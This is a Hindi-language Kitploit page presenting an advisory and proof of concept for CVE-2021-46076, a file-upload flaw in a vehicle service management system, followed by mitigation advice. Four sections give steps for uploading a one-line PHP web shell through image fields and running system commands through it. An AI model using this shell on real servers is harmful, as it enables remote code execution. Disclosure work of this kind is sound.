Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 फ़ाइल अपलोड के लिए कमजोर है। एक हमलावर कई एंडपॉइंट्स पर एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/cve-2021-46076
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsanupl/cve-2021-46076

CVE-2021-46076

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 फ़ाइल अपलोड के लिए कमजोर है। एक हमलावर कई एंडपॉइंट्स पर एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन हो सकता है।

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-46076

शोषण शीर्षक: वाहन सेवा प्रबंधन प्रणाली - 'एकाधिक' फ़ाइल अपलोड कोड निष्पादन की ओर ले जाता है

शोषण लेखक: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 उच्च

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

विवरण:

Sourcecodester वाहन सेवा प्रबंधन प्रणाली 1.0 फ़ाइल अपलोड के प्रति संवेदनशील है। एक हमलावर कई एंडपॉइंट्स पर एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन होता है।

1. वाहन सेवा प्रबंधन प्रणाली - 'MyAccount' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. My Account अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=user

पेलोड:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड को सहेजें, उदाहरण के लिए: Cmd.php
  2. My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में php फ़ाइल ब्राउज़ करें।
  3. अद्यतन बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें, उदाहरण के लिए: id, whoami, pwd आदि।

2. वाहन सेवा प्रबंधन प्रणाली - 'User List' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. User List अनुभाग पर जाएँ और Create New बटन पर क्लिक करें।

पेलोड:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड को सहेजें, उदाहरण के लिए: Cmd.php
  2. Create New User पृष्ठ पर सभी आवश्यक विवरण दर्ज करें और Avatar में php फ़ाइल ब्राउज़ करें।
  3. Save बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें, उदाहरण के लिए: id, whoami, pwd आदि।

3. वाहन सेवा प्रबंधन प्रणाली - 'Settings-System Logo' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड को सहेजें, उदाहरण के लिए: Cmd.php
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में php फ़ाइल ब्राउज़ करें।
  3. अद्यतन बटन पर क्लिक करें।
  4. System Logo छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें, उदाहरण के लिए: id, whoami, pwd आदि।

4. वाहन सेवा प्रबंधन प्रणाली - 'Settings-Website Cover' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड को सहेजें, उदाहरण के लिए: Cmd.php
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में php फ़ाइल ब्राउज़ करें।
  3. अद्यतन बटन पर क्लिक करें।
  4. Website Cover छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें, उदाहरण के लिए: id, whoami, pwd आदि।

प्रभाव:

एक हमलावर कई एंडपॉइंट्स पर दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन होता है।

शमन:

निम्नलिखित लागू करने की अनुशंसा की जाती है:

  • व्हाइट-लिस्ट फ़िल्टर के बिना किसी फ़ाइल नाम और उसके एक्सटेंशन को सीधे कभी स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो अत्यधिक अनुशंसा की जाती है कि फ़ाइल नाम और एक्सटेंशन के इनपुट के रूप में केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट स्वीकार करें।
  • सेवा से इनकार (denial of service) हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "execute" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।
टूल डाउनलोड करें